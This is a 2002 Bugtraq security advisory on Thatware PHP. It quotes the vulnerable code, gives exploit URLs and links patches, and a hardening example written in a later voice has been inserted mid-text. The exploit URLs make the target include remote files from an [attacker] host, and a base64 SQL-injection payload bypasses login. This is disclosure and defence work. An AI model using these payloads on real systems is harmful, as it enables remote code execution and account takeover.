[28064] in bugtraq


Thatware (PHP)

daemon@ATHENA.MIT.EDU (Frog Man)
Mon Dec 2 11:58:02 2002

From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 01 Dec 2002 19:35:11 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F17EiRZiUivZH0BbDgd00016dc9@hotmail.com>


Information:
°°°°°°°°°°°°°°
Versions : ? -> 0.3 -> 0.5.3
Website : http://www.thatware.org
Problems :
- Include file
- SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
artlist.php (v0.5.2, 0.5.3) :
-------------------------------------
include $root_path.'thatfile.php';
-------------------------------------


config.php (v? -> 0.3 -> 0.5.3)  :
-------------------------------------
include $root_path."db_settings.php";
-------------------------------------

thatfile.php (v? -> 0.3 -> 0.5.2) :
------------------------------------------------------------------------
if (!IsSet($thatfile)) {
include($root_path."config.php");
if (!IsSet($translation_set)) {
include $root_path."messages.$language.php"; } #Translation module, even for english needed!
------------------------------------------------------------------------

auth.inc.php (v? -> 0.3 -> 0.5.0) :
------------------------------------------------------------------------
$admintest = 0;
$mod_ok = 0;
$moderator = 0;

if(isset($user)) {
  if (!$thatfile) include("thatfile.php");
  $admin = base64_decode($user);
  $admin = explode(":", $admin);
  if (empty($admin[0]) || empty($admin[2])) exit;
  $aid = $admin[1];
  dbconnect();
  $result=mysql_query("select rights from users where uid='$admin[0]' and pass='$admin[2]'");
  if(!$result) {
        echo "Oh oh... select from database failed for admin check";
        exit;
  } else {
    list($auth_rights)=mysql_fetch_row($result);
    $auth_rights=explode(",",$auth_rights);
    if (!empty($auth_rights)) {
      $admintest=1;
      if (inarray($auth_rights, "4")||inarray($auth_rights, "1")) {
        $moderator=1;
        $mod_ok=1;
      }
    }
  }
}
------------------------------------------------------------------------



Exploits :
°°°°°°°°°°
v0.5.2, 0.5.3 :
http://[target]/artlist.php?root_path=http://[attacker]/
with
http://[attacker]/thatfile.php


v? -> 0.3 -> 0.5.3 :
http://[target]/config.php?root_path=http://[attacker]/
with
http://[attacker]/db_settings.php


v? -> 0.3 -> 0.5.2 :
http://[target]/thatfile.php?root_path=http://[attacker]/&language=1
with
http://[attacker]/config.php
and
http://[attacker]/messages.1.php


v? -> 0.3 -> 0.5.0 :
http://[target]/[NeedToBeAuth].php?user=JyBPUiAnJz0nOjE6JyBPUiAnJz0n
( base64_decode(JyBPUiAnJz0nOjE6JyBPUiAnJz0n) == ' OR ''=':1:' OR ''=')
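Both problems above come from the same root cause: a request parameter (`root_path`, `user`, `language`) reaches an `include` or an SQL string without any validation, which register_globals made trivial. The following is an added example of how the quoted patterns can be hardened; it is not Thatware's code and not the phpsecure.org patch. Only the table and column names (`users`, `uid`, `pass`, `rights`) and the rights values `1` and `4` are taken from the advisory; the whitelist of languages, the `check_admin` function name and the use of the mysqli extension are assumptions.

```php
<?php
// Hardened replacement for the include/auth patterns quoted in the advisory.
// Added example, not Thatware's own code. Table/column names come from the
// advisory; the language whitelist and function name are assumptions.

// 1. Never let a request parameter choose the include prefix. Assign the root
//    path from the script's own location; a value assigned here overrides
//    anything register_globals imported from the query string.
$root_path = __DIR__ . '/';   // PHP >= 5.3; use dirname(__FILE__) . '/' on older PHP

// 2. The translation module must only load files from a fixed whitelist,
//    so "language=1" with a remote root_path can no longer pull in code.
$allowed_languages = array('en', 'fr', 'de');   // constructed list
$language = isset($_GET['language']) ? $_GET['language'] : 'en';
if (!in_array($language, $allowed_languages, true)) {
    $language = 'en';
}
require $root_path . 'messages.' . $language . '.php';

// 3. Auth check: strict parsing of the base64 credential, then a prepared
//    statement so the quotes in a payload like ' OR ''=' are plain data.
function check_admin(mysqli $db, $user_param)
{
    // Strict mode returns false for anything that is not valid base64.
    $decoded = base64_decode($user_param, true);
    if ($decoded === false) {
        return null;
    }
    $parts = explode(':', $decoded);
    if (count($parts) !== 3) {          // original code ignored extra fields
        return null;
    }
    list($uid, $aid, $pass) = $parts;
    if ($uid === '' || $pass === '' || !preg_match('/^[A-Za-z0-9_]{1,32}$/', $uid)) {
        return null;
    }

    $stmt = $db->prepare('SELECT rights FROM users WHERE uid = ? AND pass = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('ss', $uid, $pass);
    $stmt->execute();
    $stmt->bind_result($rights);
    $found = $stmt->fetch();
    $stmt->close();
    if (!$found) {
        return null;
    }

    $rights = explode(',', (string) $rights);
    return array(
        'admintest' => 1,
        // Same rights semantics as the original: 4 or 1 grants moderator.
        'moderator' => (in_array('4', $rights, true) || in_array('1', $rights, true)) ? 1 : 0,
    );
}
```

The essential change for the SQL injection is that `uid` and `pass` are bound as parameters rather than interpolated, so the decoded payload `' OR ''='` is compared literally against the column and matches no row; the `empty()` checks in the original were never a defence because the payload is a non-empty string. For the include issue, `$root_path` is set by the script itself after any request variables have been imported, and as defence in depth `allow_url_fopen = Off` (and, on PHP 5.2 or later, `allow_url_include = Off`) in php.ini stops `include` from fetching `http://` URLs at all, which would have blocked every remote-include vector listed above even on unpatched code.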



Patches:
°°°°°°°°
0.5.3:
http://www.phpsecure.org/patch/dl.php?id=47
0.5.2:
http://www.phpsecure.org/patch/dl.php?id=51
0.5.0:
http://www.phpsecure.org/patch/dl.php?id=50
0.4.5:
http://www.phpsecure.org/patch/dl.php?id=52
0.4.4:
http://www.phpsecure.org/patch/dl.php?id=49
0.4.3:
http://www.phpsecure.org/patch/dl.php?id=48
0.4.2:
http://www.phpsecure.org/patch/dl.php?id=53
0.4.1:
http://www.phpsecure.org/patch/dl.php?id=54
0.4:
http://www.phpsecure.org/patch/dl.php?id=55
0.3:
http://www.phpsecure.org/patch/dl.php?id=56

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/Thatware.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FThatware.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n



